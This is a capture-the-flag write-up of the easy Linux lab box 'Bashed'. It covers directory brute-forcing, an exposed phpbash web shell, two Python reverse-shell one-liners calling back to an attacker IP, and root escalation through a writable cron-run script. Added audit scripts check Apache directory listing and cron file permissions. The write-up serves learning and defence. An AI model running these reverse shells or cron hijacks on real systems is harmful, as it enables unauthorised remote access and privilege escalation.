Summary

Bashed is an easy Linux box that can be exploited by discovering a PHP web shell named ‘phpbash.php’ on the webserver. Privileges can be escalated by exploiting a cronjob that is running as root.


Discovery

Nmap discovered the following open ports and services:

nmap -sC -sV -oN fullscan -Pn 10.129.24.131

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

The first thing I checked was the webserver and the page it presents to the user.

I checked the page source with Ctrl+U but found nothing relevant, so I started a directory brute-force with the following command:

dirb http://10.129.24.92

This gives the following results:

/images (Status: 301)
/uploads (Status: 301)
/php (Status: 301)
/css (Status: 301)
/dev (Status: 301)
/js (Status: 301)
/fonts (Status: 301)
/server-status (Status: 403)  

Each of these directories was brute-forced individually, and the dev directory turned out to have directory listing enabled. Navigating to 10.129.24.131/dev/ therefore shows two files; both are web shells from which commands can be executed on the server.
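Directory listing is what exposed the web shells under /dev/ here, so it is the configuration a defender wants to catch. The following shell function is an added example, not part of the original writeup: it scans Apache configuration files for <Directory> blocks whose Options line enables Indexes and reports them. The hardened form is Options -Indexes (or simply leaving Indexes out), which the scan does not flag. The config paths it is run against are supplied by the caller; the sample below is constructed.

```shell
#!/bin/sh
# Added audit helper (not from the writeup): report every <Directory> block in
# the given Apache config files whose "Options" line enables directory listing.
# Assumes POSIX awk. Usage: find_indexes_enabled FILE...
find_indexes_enabled() {
    awk '
        # Remember which <Directory ...> block we are inside.
        tolower($0) ~ /^[[:space:]]*<directory[[:space:]]/ {
            dir = $0
            sub(/^[[:space:]]*<[^[:space:]]+[[:space:]]+/, "", dir)
            sub(/>.*$/, "", dir)
        }
        tolower($0) ~ /^[[:space:]]*<\/directory>/ { dir = "" }
        # Apache enables listings for a bare "Indexes" or "+Indexes";
        # "-Indexes" disables them and is therefore not reported.
        tolower($1) == "options" {
            for (i = 2; i <= NF; i++)
                if (tolower($i) == "indexes" || tolower($i) == "+indexes")
                    print FILENAME ": directory listing enabled for " (dir == "" ? "(server-wide)" : dir)
        }
    ' "$@"
}

# Constructed example config (hypothetical paths, not the box's real files):
#   find_indexes_enabled /etc/apache2/apache2.conf /etc/apache2/sites-enabled/*.conf
```

A hit means the directory will serve a file index to anyone who can reach it, so any stray file dropped there (a forgotten web shell, a backup, an editor swap file) becomes discoverable without guessing its name.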


Exploitation

To obtain a reverse shell, the following payload from Pentest Monkey was used:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.33",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

This is a Python reverse shell and it opens a shell as the www-data user. Looking in the home directory reveals a user named arrexel, whose directory contains user.txt.


Privilege Escalation

Next up is escalating privileges to root. Checking sudo -l gave the following result:

$ sudo -l
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL

The root directory contains a directory called scripts. However, it was only accessible to the user scriptmanager. For simplicity, a new Python reverse shell was executed FROM the scriptmanager user (because www-data can run commands as scriptmanager), as shown below:

sudo -u scriptmanager python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.33",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Notice the first part of the command, sudo -u scriptmanager, which makes it run as the scriptmanager user; this gives a reverse shell as scriptmanager. Now you can enter the scripts directory, where you will find two files: a Python file that is being run as a cronjob by root (notice the timestamp) and a text file owned by root. At this point it is pretty obvious that you can replace test.py with something like this:

import os
# test.py is executed by root's cronjob, so this line runs with root
# privileges and copies the root flag into a file named powned.txt
os.system("cat /root/root.txt > powned.txt")

After this, wait a minute and you will find a newly created text file, powned.txt, containing the root flag.
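The escalation works only because a root cronjob executes a script that a non-root account can modify. The following shell function is an added example, not part of the original writeup, that performs the defender's side of that check: it reads crontab files, extracts every absolute path a job references, and flags any target file that is not owned by root or is group- or world-writable. It assumes GNU coreutils stat and find (Linux); the crontab paths are supplied by the caller, and the sample below is constructed.

```shell
#!/bin/sh
# Added audit helper (not from the writeup): flag files that a cron entry
# executes but that someone other than root could modify.
# Assumes GNU stat/find. Usage: audit_cron_scripts /etc/crontab /etc/cron.d/*
audit_cron_scripts() {
    for crontab in "$@"; do
        [ -f "$crontab" ] || continue
        # Drop comments, blank lines and VAR=value assignments, then pull out
        # every whitespace-delimited token that starts with "/" (the script,
        # interpreter or data file a job touches). Time fields like "*/5"
        # are not preceded by whitespace, so they are not captured.
        grep -Ev '^[[:space:]]*(#|$)|^[[:alnum:]_]+=' "$crontab" |
        grep -oE '(^|[[:space:]])/[^[:space:]]+' | tr -d ' \t' | sort -u |
        while read -r target; do
            [ -f "$target" ] || continue
            # -L follows symlinks so a link to a root-owned binary is judged
            # by its target, not by the link's own 777 mode.
            owner=$(stat -L -c '%U' "$target")
            if [ "$owner" != root ]; then
                echo "WEAK $target owned-by:$owner (cron in $crontab)"
            elif [ -n "$(find -L "$target" -maxdepth 0 \( -perm -020 -o -perm -002 \) 2>/dev/null)" ]; then
                echo "WEAK $target group-or-world-writable (cron in $crontab)"
            fi
        done
    done
}
```

Every WEAK line is a file whose contents run as root on the cron schedule while being editable by a lower-privileged account, which is exactly the condition the test.py replacement above relies on. The fix is to make such scripts root-owned and mode 755 or stricter, or to run the job as the account that legitimately owns the script.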